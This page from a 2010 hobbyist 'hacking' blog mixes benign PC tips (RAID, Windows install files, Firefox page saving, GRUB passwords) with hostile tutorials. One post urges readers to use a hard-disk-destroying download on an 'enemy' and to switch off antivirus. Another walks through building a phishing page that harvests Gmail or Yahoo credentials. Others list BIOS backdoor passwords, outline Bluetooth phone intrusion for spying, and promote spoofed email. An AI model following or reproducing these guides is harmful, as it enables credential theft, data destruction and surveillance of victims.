Showing posts with label Tutorials. Show all posts
Showing posts with label Tutorials. Show all posts

Tuesday, December 14, 2010

Speedup Your HDD With Raid


If one fast drive is good, then five working together is surely better.
Redundant Array of Inexpensive Disks (RAID) technology has been a significant lifesaver and performance boost for file servers. RAID can be set up in different configurations to provide systems with fault-tolerance or performance enhancements that are crucial to keeping data safe. It can be applied to personal desktop systems to provide significant disk drive performance enhancement.

RAID-0 (zero) is the most basic and highest performing RAID configuration. Portions of data normally stored on one disk drive are spread out across multiple drives, and those drives are accessed in parallel to deliver the data faster, because each drive does not have to access all of the data before it can be delivered. RAID-0 is unfortunately and by nature the least reliable in terms of data integrity, because a failure in any single drive renders all of the data useless.

In contrast to RAID-0, in a RAID-1 configuration all of the data is stored equally on two drives, in parallel. This slows the storage and reading performance but almost guarantees that the data remains intact even if one of the drives fails.

RAID-5
is somewhat a mix of RAID-0 and RAID-1, striping data across multiple drives but also adding error correction information across the drives, providing the advantages of parallel drives and a high degree of ability to recover data if one drive should fail.

Another hybrid implementation of RAID that is very affordable and intended for desktop system is RAID-0+1. The Promise Technology (http://www.promise.com) FastTrak TX4000 RAID controller card is specifically meant for desktop users with an appetite for high-performance disk systems. Performance enhancements of up to 30% are possible. Upgrading with top-performing disk drives and putting them into a RAID configuration just might knock the dust bunnies out of your keyboard.

The basic steps to install a RAID configuration on your PC are listed below. Be aware that the specific steps will be unique to the RAID controller (system board or add-in card type), your system BIOS, and RAID configuration software. After installation, the RAID configuration should appear to your operating system as a single-disk volume.

You need a RAID controller or RAID capabilities built into your system board. Promise Technologies is one of the most popular brands of add-in RAID controllers for IDE drives.

Have at least two identical disk drives on hand for RAID-0 and 1. Configuration of a simple RAID is a lot easier if the drives are identical: there will be no wasted space, and they should mirror each other and perform equally well. RAID 0+1 will require at least four disks.

If necessary, make a bootable DOS diskette with any necessary drivers or configuration program for your RAID controller. For BIOS-based RAID setups, familiarize yourself with the RAID setup screens and options in BIOS. It is likely you will have to connect the RAID drives to different IDE connections than the normal non-RAID IDE interfaces.

With the system powered down, install and connect the drives to the RAID controller interface connectors.

Start the system and either boot with the DOS diskette containing the RAID controller configuration program or get into the BIOS setup to access the RAID configuration screens.

Select the type of RAID you will be creating—typically 0, 1, or 0+1.

Partition the drives with the configuration program or BIOS screens. This process establishes how the RAID controller views and uses the drives.

When RAID controller configuration and disk partitioning is complete, you will either FORMAT the drives under DOS or start the installation of your operating system onto the new RAID system as the primary boot drive.

(RAID 1 and higher only) To test your configuration after installing your operating system, shut down and disconnect one of the RAID drives, then restart to verify that indeed the RAID system actually mirrors data to one of the drives.
Continue reading →

Speedup Operating System Installation And Maintainance

Save yourself time by making Windows installation files available on your hard drive.

We know you've had this problem: you install a new mouse, change a network setting, do almost anything that upsets the delicate balance in Windows and you're prompted to insert the Windows so-and-so CD. Where is it? Did you grab the right one?

If you have a lot of free disk space (about 700 MB), take a cue from the major PC makers and copy the files from your Windows CD to your hard drive. In fact, it's not a bad idea to copy the files before you install Windows so the resulting installation automatically knows where to find the files later—thus no prompting to insert a CD later.


PC manufacturers have typically placed the Windows 95, 98, 98SE, and Me files in a C:\WINDOWS\OPTIONS\CABS folder, and Windows NT, 2000 or XP files into C:\i386.

You can emulate this pattern for Windows 9x-Me by creating these folders on your hard drive from a DOS prompt, then copying the files from the CD (assuming this is drive D:) as follows, from the A:\> DOS prompt:

A:\>C:

C:\>MD WINDOWS C:\>MD

\WINDOWS\OPTIONS C:\>MD

\WINDOWS\OPTIONS\CABS C:\>CD

\WINDOWS\OPTIONS\CABS C:\

\WINDOWS\OPTIONS\CABS>COPY

D:\WIN98\*.*


Start the Windows installation from this folder by typing:

C:\ \WINDOWS\OPTIONS\CABS>SETUP

For Windows NT-XP:

A:\>C: C:\>MD

i386 C:\>CD i386

C:\I386>COPY D:\i386\*.*


Start the Windows installation from this folder by running this command:

C:\I386>WINNT


The next time Windows needs a file from the installation CD it will automatically look in the appropriate folder, copy the file, and move on.
Continue reading →

Damage Hard Disk Of Your Enemy : Please Don try On urs, Its A Genuine One


HI guys, This time m back with a really Awesome technique if U R Having any Enemy n if you want to take revenge from Sumone.

This Tool, or software or watever, if You Opens this , It Would Simply go for destroying Your Hard Disk Forever.. No If No Buts, No Permissions, No Denies. 

Once started, it wud take any breathe after Killing Your HDD, so Bettter B aware n keep this Very safely , A Sngle Double Click can make u a l'l tensed..

N Finally I m gonna reveal this Out. These Are the links.

http://www.ziddu.com/download/10661911/HardDiskKiller.txt.html

http://www.ziddu.com/download/10661912/readme.txt.html

Go for downloading them, it wud nto show any virus, No Antivirus Wud detect it.


But u want to Go off with it, Disable your Antivirus or ur frns's n u r done.

Here is one more step which m not including, so u have to Put On Sum of ur Brain. If u r really a keen hacker, thn u probably knows wat u have to do nxt.


Script Kiddies cn ask me thru comments..wud tell That Hidden Step As Well.
Enjoy Hacking Enjoy

NOTE: USE ON YOUR OWN RISK AND WILL, I DO NOT HOLD ANY RESPONSIBILITY IF YOU ARE TRAPPED.
Continue reading →

How To Byepass BIOS Passwords : The Smart Way


Introduction to BIOS Passwords

The best method to reset a BIOS password depends on what BIOS the computer has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.
Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.
The general categories of solutions to reset a BIOS password are:
  • Using a Backdoor BIOS Password
  • Resetting the BIOS Password using Software
  • Resetting the BIOS Password using Hardware
  • Vendor Specific Solutions for resetting the BIOS Password

Using a Backdoor BIOS Password

Some BIOS manufacturers implement a backdoor password. The backdoor password is a BIOS password that works, no matter what the user sets the BIOS password to. These passwords are typically used for testing and maintenance. Manufacturers typically change the backdoor BIOS passwords from time to time.

AMI Backdoor BIOS Passwords

Reported AMI backdoor BIOS passwords include A.M.I., AAAMMMIII, AMI?SW , AMI_SW, BIOS, CONDO, HEWITT RAND, LKWPETER, MI, and PASSWORD.

Award Backdoor BIOS Passwords

One reported Award backdoor BIOS password is eight spaces. Other reported Award backdoor BIOS passwords include 01322222, 589589, 589721, 595595, 598598 , ALFAROME, ALLY, ALLy, aLLY, aLLy, aPAf, award, AWARD PW, AWARD SW, AWARD?SW, AWARD_PW, AWARD_SW, AWKWARD, awkward, BIOSTAR, CONCAT, CONDO, Condo, condo, d8on, djonet, HLT, J256, J262, j262, j322, j332, J64, KDD, LKWPETER, Lkwpeter, PINT, pint, SER, SKY_FOX, SYXZ, syxz, TTPTHA, ZAAAADA, ZAAADA, ZBAAACA, and ZJAAADC.

Phoenix Backdoor BIOS Passwords

Reported Phoenix BIOS backdoor passwords include BIOS, CMOS, phoenix, and PHOENIX.

Backdoor BIOS Passwords from Other Manufacturers

Reported BIOS backdoor passwords for other manufacturers include:
ManufacturerBIOS Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
SOYO SY_MB
TMC BIGO
Toshiba Toshiba
Remember that what you see listed may not be the actual backdoor BIOS password, this BIOS password may simply have the same checksum as the real backdoor BIOS password. For Award BIOS, this checksum is stored at F000:EC60.

Resetting the BIOS Password using Software

Every system must store the BIOS password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the BIOS password. You must know the memory address where the BIOS password is stored, and the format in which the BIOS password is stored. Or, you must have a program that knows these things.
You can write your own program to read the BIOS password from the CMOS memory on a PC by writing the address of the byte of CMOS memory that you wish to read in port 0x370, and then reading the contents of port 0x371.
!BIOS will recover the BIOS password for most common BIOS versions, including IBM, American Megatrends Inc, Award and Phoenix.
CmosPwd will recover the BIOS password for the following BIOS versions:
  • ACER/IBM BIOS
  • AMI BIOS
  • AMI WinBIOS 2.5
  • Award 4.5x/4.6x/6.0
  • Compaq (1992)
  • Compaq (New version)
  • IBM (PS/2, Activa, Thinkpad)
  • Packard Bell
  • Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107
  • Phoenix 4 release 6 (User)
  • Gateway Solo - Phoenix 4.0 release 6
  • Toshiba
  • Zenith AMI

Resetting the BIOS Password using Hardware

If you cannot access the machine after if has been powered up, it is still possible to get past the BIOS password. The BIOS password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information (including the BIOS password) will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.
On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery. If you cannot locate this jumper, you might short both of the points where the battery connects to the motherboard.
If all else fails, you may have to clear the BIOS password by resetting the RTC (Real Time Clock) IC (Integrated Circuit) on your motherboard.
Many RTC's require an external battery. If your RTC is one of this type, you can clear the BIOS password just by unsocketing the RTC and reseating it.
RTC's which require external batteries include:
  • Dallas Semiconductor DS12885S
  • TI benchmarq bq3258S
  • Motorola MC146818AP
  • Hitachi HD146818AP
  • Samsung KS82C6818A
Most RTC chips with integrated batteries can be reset to clear the BIOS password by shorting two pins together for a few seconds.
You will see more than one option for some chips due to testing by various people in the field. Remember to remove power from the system before shorting these pins.
RTC ChipPins
Dallas DS1287ATI benchmarq bp3287AMT 3 (N.C.) and 21 (NC/RCL)
Chips & Technologies P82C206 12 (GND) and 32 (5V)-or-74 (GND) and 75 (5V)
OPTi F82C206 3 and 26
Dallas Semiconductor DS12887A 3 (N.C.) and 21 (RCLR)
You should be able to discover how to reset the BIOS password stored in most RTC (Real Time Clock) chips by reading the manufacturers data sheet for that RTC. Some RTC's, like the Dallas DS1287 and TI benchmarq bq3287mt cannot be cleared. The solution to resetting the BIOS password on systems with those RTC's is to purchase a replacement RTC chip. How inconvenient!

i Hope You guys enjoyed the Article, Enjoy Hacking, Enjoy Hackplanet.
Continue reading →

Create A fake Login Page

Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you
The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.


{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url ofthe file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
see my fake login page
www.citkatboy.110mb.com/index.html
Continue reading →

How To Send Fake OR Anonymous Emails


Below is list of 4 Fake email service that allow you to send fake email to anyone .This service is maily used to prank yours friends and relatives ,you can prank by sending mail  on name of any website or Institute  like orkut@orkut.com or any other email id,Try it and Enjoy ! :P
  • FakeMailer.Info – Helps you to send Fake eMails and Prank your Friends! You Can Enter any sender Name-Email you want and scare your Friends About their bills,Notice About their illegal internet activity or anything else you may want! Dont Forget To phone them after to tell that is just a prank.
  • Anonymailer.net – Is the most trusted anonymous email service that send anonymous email every day over hundreds of free anonymous emails are sent from this website,  You can use whatever e-mail address you like as a reply address.
  • Deadfake -Use this web to send an email to whoever you want. You can make it looks like it’s coming from anyone you like. Just fill in the form and  press send.
  • Fakemymail is another Fake email service that send fake email this service allows you to send free prank emails   to your friends and family. Send prank emails and fake emails to anyone you want for a funny email prank anytime of day or night.
  • AnonymousSpeech.com is a Professional provider for secure anonymous email, Here you need to create account to use this service,watch below video to know much more about this service .
  • Fake Email Prank – Funny bloopers are a click away
Note: X-( By sending a fake email or prank email you may be committing the offence of fraud even you did not intend to. You are not allowed to use this service for any illegal activities at any time.All above r fake email service is not liable for your emails you send at any time. :-|
Continue reading →

Spider The Web With Mozilla Firefox

http://www.alanbauer.com/images/Patterns%20in%20Nature/Spider%20web%20with%20dew.jpg


If a web page is precious, a simple bookmark might not be enough. You might want to keep a copy of the page locally. This hack explains how to save lots of things at once with Firefox. Usually this kind of thing is done by a web spider. A web spider is any program that poses as a user and navigates through pages, following links.
For heavy-duty web site spidering done separately from Firefox, Free Download Manager (http://www.freedownloadmanager.org) for Windows and wget(1) for Unix/Linux (usually preinstalled) are recommended.

Save One Complete Page

The days of HTML-only page capture are long gone. It's easy to capture a whole web page now.
Saving using Web Page Complete
To save a whole web page, choose File Save Page As... and make sure that "Save as type:" is set to Web Page Complete. If you change this option, that change will become the future default only if you complete the save action while you're there. If you back out without saving, the change will be lost. When the page is saved, an HTML document and a folder are created in the target directory. The folder contains all the ancillary information about the page, and the page's content is adjusted so that image, frame, and stylesheet URLs are relative to that folder. So, the saved page is not a perfect copy of the original HTML. There are two small oddities to watch out for:
  • On Windows, Windows Explorer has special smarts that sometimes treat the HTML page and folder as one unit when file manipulation is done. If you move the HTML page between windows, you might see the matching folder move as well. This is normal Windows behavior.
  • If the page refers to stylesheets on another web site using a tag, these stylesheets will not be saved. As a result, Firefox will attempt to download these stylesheets each time the saved HTML copy is displayed. This will take forever if no Internet connection is present. The only way to stop this delay is to choose File Work Offline when viewing such files.
Saving using Print
One problem with saved web pages is that the copy is just a snapshot in time. It's difficult to tell from a plain HTML document when it was captured. A common technique that solves this problem and keeps all the HTML content together is to use Acrobat Distiller, which comes with the commercial (nonfree) version of Acrobat Reader.
When Distiller is installed, it also installs two printer drivers. The important one is called Acrobat PDFWriter. It can convert an HTML page to a single date-stamped PDF file. Although such PDF files are large and occasionally imperfect, the process of capturing web pages this way is addictive in its simplicity, and the files are easy to view later with the free (or full) Reader. The only drawback is that PDF files can be quite large compared to HTML.
To save web pages as PDF files, choose File Print... from the Firefox menu, choose Adobe PDFWriter as the device, and select the Print to File checkbox. Then, go ahead and print; you'll be asked where to save the PDF results.

Save Lots of Pages

To save lots of Web pages, use an extension. The Download Tools category at http://update.mozilla.org lists a number of likely candidates. Here are a few of them.
4.11.2.1 Down Them All
The Down Them All extension (http://downthemall.mozdev.org), invoked from the context menu, skims the current page for foreign information and saves everything it finds to local disk. It effectively acts as a two-tier spider. It saves all images linked from the current page, as well as all pages linked to from the current page. It doesn't save stylesheets or images embedded in linked-to pages.
Two of the advantages of Down Them All are that it can be stopped partway through, and download progress is obvious while it is underway.
Magpie
The Magpie extension (http://www.bengoodger.com/software/tabloader/) provides a minimal interface that takes a little getting used to. For spidering purposes, the context menu items that Magpie adds are not so useful. The special keystroke Ctrl-Shift-S, special URLs, and the Magpie configuration dialog box are the key spidering features.
To find the Magpie configuration system, choose Tools Extensions, select the Magpie extension, and then click Options.
Using this dialog box, you can set one of two options for Ctrl-Shift-S (detailed in the radio group at the top). Everything else in this window has to do with folder names to be used on local disk.
The first time you press Ctrl-Shift-S, Firefox asks you for the name of an existing folder in which to put all the Magpie downloads. After that, it never asks again.
By default, Ctrl-Shift-S saves all tabs to the right of the current one and then closes those tabs. That is one-tier spidering of one or more web pages, plus two-tier spidering for any linked images in the displayed pages.
If the "Linked from the current page..." option is selected instead, then Magpie acts like Down Them All, scraping all images (or other specified content) linked from the current page.
In both cases, Magpie generates a file with the name YYYY-MM-DD HH-MM-SS (a datestamp) in the target directory and stuffs all the spidered content in there.
The other use of Magpie is to download collections of URLs that have similar names. This is like specifying a keyword bookmark, except that only numbers can be used as parameters and they must be hand specified as ranges. For example, suppose these URLs are required:
http://www.example.com/section1/page3.html

http://www.example.com/section1/page4.html

http://www.example.com/section2/page3.html

http://www.example.com/section2/page4.html

Using the special bkstr: URL scheme (an unofficial convenience implemented by Magpie), these four URLs can be condensed down to a single URL that indicates the ranges required:
bkstr://ww.example.com/section{1-2}/page{3-4}.html

Retrieving this URL retrieves the four pages listed directly to disk, with no display. This process is also a one-tier spidering technology, so retrieved pages will not be filled with any images to which they might refer. This technique is most useful for retrieving a set of images from a photo album or a set of documents (chapters, minutes, diary entries) from an index page.
Slogger
Rather than saving page content on demand, the Slogger extension (http://www.kenschutte.com/firefoxext/) saves every page you ever display. After the initial install, the extension does nothing immediately. It's only when you highlight it in the Extensions Manager, click the Options box, and choose a default folder for the logged content that it starts to fill the disk. The configuration options are numerous, and Perl-like syntax options make both the names of the logged files and the content of the log audit trail highly customizable.
Since Slogger saves only what you see, how well it spiders depends on how deeply you navigate through a web site's hierarchy. Note that Mozilla's history mechanism works the same way as Slogger, except that it stores downloaded web pages unreadably in the disk cache (if that's turned on), and that disk cache can be flushed or overwritten if it fills up.

Learning from the Master

Bob Clary's CSpider JavaScript library and XUL Spider application are the best free tools available for automating web page navigation from inside web pages. You can read about them here: http://www.bclary.com/2004/07/10/mozilla-spiders.
These tools are aimed at web programmers with a systematic mindset. They are the basis of a suite of web page compatibility and correctness tests. These tools won't let you save anything to disk; instead, they represent a useful starting point for any spidering code that you might want to create yourself.
Continue reading →

How To Password Protect Your Linux Box (OS) With GRUB


GRUB, the Only bootloader for Linux OS, as NTLDR works in windows..
here , the basic idea for Securing the Linux box wiht GRUB is, we implies sum security on GRUB itself..The MOst basic Phase in Loading Of An Operating System.
 
However , Gettin bypassed with GRUb is also not that much difficult, its as easy as Burning a MATCH STICk, bt guys, i wud tell u that somehow later.
So wt the basic idea is, If you don't want someone booting your machine without permission, you can add a password to your GRUB entries. You can add a password only to specific entries if you wish; this will require a user to enter a password before loading only those boot entries you protect. This can be useful when done on your Recovery Mode entries, which bring up a passwordless root login by default.

To get started, let's first encrypt the password we want to use. Open up a terminal and enter the grub command. This brings up a grub shell. In this shell, enter the md5crypt command. When prompted, type in the password you want on your grub entries. (Don't worry, this won't write anything to your files!) After pressing Enter, you will be given an encrypted password string. Copy the string to your clipboard. Enter quit to exit the grub shell and return to bash.

Code:
GNU GRUB  version 0.95  (640K lower / 3072K upper memory)

[ Minimal BASH-like line editing is supported. For the first word, TAB
lists possible command completions. Anywhere else TAB lists the possible
completions of a device/filename. ]

grub> md5crypt

Password: *************
Encrypted: $1$w7Epf0$vX6rxpozznLAVxZGkcFcs.

grub>
Now that we have an encrypted password, it's time to add it to grub. Using sudo, open up /boot/grub/menu.lst using your favorite text editor.
 
Note : if ur version of linux Box does not Encrypts password as such, Then you may have to Copy The encrypted passwrd frm the Shadow Fiel..(If U r having this case, do ask me, n i wud tell u the whole game IN step wise step manner)
After the "initrd" line for each entry you want to password protect, start a new line beginning with password --md5 and paste in your newly-encrypted password. Using the above example password on the i386 recovery entry, this:
Code:
title Ubuntu, kernel 2.6.8.1-2-386 (recovery mode)
root (hd1,2)
kernel /boot/vmlinuz-2.6.8.1-2-386 root=/dev/hdb3 ro single
initrd /boot/initrd.img-2.6.8.1-2-386

Becomes this:
Code:
title Ubuntu, kernel 2.6.8.1-2-386 (recovery mode)
root (hd1,2)
kernel /boot/vmlinuz-2.6.8.1-2-386 root=/dev/hdb3 ro single
initrd /boot/initrd.img-2.6.8.1-2-386
password --md5 $1$w7Epf0$vX6rxpozznLAVxZGkcFcs.
You must add such a line after every entry you want to password protect. As I mentioned earlier, I password protected my recovery mode entries out of sheer paranoia.

Save the file, and reboot. (The first time you try this, I suggest only doing it to one entry so you can test it to make sure it works, and you can still use another entry to boot your machine in case something went wrong.)

For a bit of added peace of mind, you can prevent everyone except root from reading /boot/grub/menu.lst by doing:

Code:
sudo chmod 600 /boot/grub/menu.lst
______________________________________________________________________________

Thats it u r finished with it.

Hopes u enjoy this., have fun. Enjoy Hacking.. Enjoy
Continue reading →

Format Noki6600 And Noki 6630 Mobile phone

FULL Formatting Nokia 6600 & 6630 phonesIf you have nokia 6600 or nokia 6630 and you are facing problem likeblack screen phone and unable to reboot ,error message such as “child installer” keep popping-up.phone start only at “Nokia” word screen orit may possible that you are not able to uninstall some program after installationFull formatting nokia 6600 and 6630 phones will solve these problems.but before formatting take few precautions


1)Make sure battery is fully charged atleast 70 to 80 %.
2)Take back up of all important data like contacts list and personal files.now
3)Switch-off your 6600 phone.
4)Press and hold these 3 keys at the same tome;
Green dial key, * (star key) & no. 3 key
Then press the power on/off to swtich on the 6600 phone.hold all pressed keys until you see a formatting word screen show!
5. After a few minutes when your nokia phone’s full formatting completed, your 6600 will back to original system and factory settting.
All apps installed and data will not available you need to install everything except default applications.
Now restore your back up.
This is Work with all devices. here is link for nokia unlock codes.
Continue reading →

How To break or reset Nokia Security Code - Nokia Unlock-

From Nokia’s webpage:

“The Phone Lock prevents your phone data from being accessed if
your phone is stolen.

“The lock code is a number that prevents unauthorized persons from
using your phone. These control codes are for your protection.”

You all must be knowing the master code trick (which never worked for me :p)


There is one more way to reset your security code. THC NOKIA UNLOCK. It helps to reset NOKIA security code without flashing.

It will reset your NOKIA security code to 12345.

The program was tested on Nokia 6630,6680,N70,N72. It should work on other symbian os phones also.

You can download the user guide from here.
DOWNLOAD NOKIA THC UNLOCK
Continue reading →

Hack A Bluetooth Mobile- Learn Latest Computer And MObile hacking Tricks

1. Start the Bluetooth Hardware from your Laptop (ie. - FN + F5 for IBM laptop)

2. Start the service for Bluetooth on your Fedora Server (See Below:)

3. Load the Bluetooth Module (Required for Bluz)

4. Bind the Bluetooth Device to the Computer rfcomm0 port (make sure the port is being created if it’s missing)


5. Modify Parameter in the Program “bluetest.pl” and run the program

6. Bluetest.pl should find the Mobile Devices (Phone, etc) which has Bluetooth enabled

7. Connect to the device Found (in a binding Manner) and start extracting information from device (phone must accept)

8. Reading and Sending SMS (The messages must still need to be converted to appropriate character)

9. Extract Last 5 dial, missed and received calls. (This require more program hacking to be successful)

10. Adding entries into the Phone book and reading the first 5 entries in the phone book (require more program hacking)

11. Making a call from the mobile (can be useful for spying on someone)

12. Program Terminated.

You Are Done...
Continue reading →

Unlock Your Iphone Instantly

How many gadgets freak do you know who are not interested to own an iPhone. I do not think there are any. Apple iPhone especially the iPhone 3G has created a rage among gadget savvy as well as normal users. It is not only a mobile but a personal entertainment device on the go. But not every one is lucky to use an iPhone like those in US or Europe. This is because firstly till date iPhone has not been released worldwide and secondly iPhone is not sold over the counter in a gadget shop rather it is sold along with a mobile service. So even if it is released in your country you do not have the option to use it along with your favorite carrier and the carrier which provides iPhone charge an extremely non-affordable plan (outside US). For example an 8GB iPhone comes with a price tag of approximately INR 30,000 from Airtel and almost same from Vodafone in India. However the same phone in US from AT&T is available for approx USD 199.



To avoid this discrepancies and to make the iPhone accessible by general public the concept of unlocking iPhone came out. So let me tell about what exactly is unlocking or an unlocked iPhone. Unlocking lets you place calls with any GSM carrier by inserting different Subscriber Identity Modules (SIMs) into the phone. Normally these SIMs from unapproved carriers won’t work. When your iPhone is unlocked, just buy a local GSM-compatible SIM, place it in your phone, and make your calls. Most phones in the US are “locked” to a particular network. In the iPhone’s case, that’s AT&T for the US, O2 for Great Britain, and so on. Should you want to use your iPhone with another GSM carrier, you need to unlock.



When Apple released the latest 2.1.1 version of the iPhone firmware it is no longer possible to unlock iPhone via software. But there are iPhone unlocking service providers which provides very reliable unlocking service. The method is thoroughly tested with SIMs from various countries and it is working fine without any hassle. So how does this method work?

The 3G iPhone unlock solution is a hardware unlock solution in the form of a ‘piggy back sim’. This hardware unlock solution is a plug and play solution that will instantly unlock your 3G iPhone. The 3G iPhone Unlock SIM is a super thin ( 0,01 mm.) sim card that slides over the sim card of the carrier that you want to use. It basically “fools” the iPhone into thinking that the original SIM is inserted.

The 3G Unlock SIM unlock sim card will not make any changes to the iPhone software. Its a simple plug and play solution. Just slide the 3G unlock sim on top of your existing carrier sim, and your 3G iPhone will be fully unlocked with all functions working. The main benefit of a hardware unlock solution is so you will not loose any warranty at all.

For more information and demo videos about this unlocking service, you can head over to iPhone 3G unlocking website.
Continue reading →

How to Sene Anonymous text Messages to Mobile Phones

Want to send a mash note to someone you’re secretly admiring? Got a tip about some shenanigans at your office that you want to let the HR department know about? Just want to really freak someone out? AnonTxt.com is a service that lets you send anonymous SMS text messages to anyone.

Just visit the AnonTxt home page to get started. (For sending text messages outside the U.S. and Canada, use AnonTxt’s international page.) If you want, you can enter an alias for yourself in the first box. Put an optional subject line in the second box. Then type the recipient’s phone number and your message. When you hit Submit, your message will go off into the either, winging its way anonymously to the recipient.

When they receive the message, it will contain your message together with the subject line. The sender will appear as “Anon@AnonTxt.com” unless you entered an alias, in which case that’s what the “sender” field will show. And since you’re not required to enter any information about yourself to use AnonTxt, the odds are very low that the message can ever be traced to you.

Note that it may be possible for law enforcement officials to subpoena the AnonTxt company, get their web traffic logs, and figure out the IP address of the computer you used when you visited AnonTxt.com. (The company’s privacy policy acknowledges this.) In that way, it might be possible to trace your message back to you. But it would take a serious law enforcement reason to do something like that. For love letters and gentle pranks, this is as anonymous as it gets.

But please, be kind. Anonymity is a useful and even critical service for many good reasons — for instance, people in repressive regimes may depend on anonymity to get the news out, organize themselves, and resist their governments. But it’s possible to abuse the privilege of anonymity too, and that can undercut the case for keeping services like this truly anonymous. When you use AnonTxt.com, don’t be a jerk.
Continue reading →

How to Unlock or Hack memory card when you forgot your memory card password.


Some times it happens that you forgot the password of your memory card and you have lots of your important data in your phone.
So there are two types of methods for recovering the password of your memory card with the help of nokia phone.


For Nokia s60 1st and 2nd edition phones.
1. First Install FExplorer in your phone memory.
2. Got to drive C: , you will find a file called mmcstore
3. Send it to your pc directly and open it in notepad or rename the file.
4. At the end of the file you will find your password.

For Nokia S60 3rd Phones, Nokia N-Series and Nokia E-Series

There is almost no way yet known to hack the memory card password in case of these types of phone but there is a way to do it some of the s60 3rd edition phones and almost all the E-series phones.
The remote lock option in E-Series phone allws you to unlock your phone by sending a sms.
The only thing you have to do is to activate this feature by going to Tools | Settings | Security | Phone and SIM | Allow remote lock menu. The password of your memory card will be your remote lock message.
So you have to just send a sms containing your remote lock message that will automatically change your memory card passsword.
If you have any queries in following the above procedure leave a comment here.
Continue reading →


 

Popular Posts

Copyright 2010 Craze Club. All rights reserved.
A Blog By Qemren l Online Movies, Crazy Videos and Pictures,Pakistani Stage Dramas, Knowledge, World News,facebook wallpapers, Men Women Urban Fashion,Desi Fashion, Celebrities, Online Games, Wallpapers, Articles, Love, Technology, Sports, Interesting, Art,Information, History etc..

Craze Club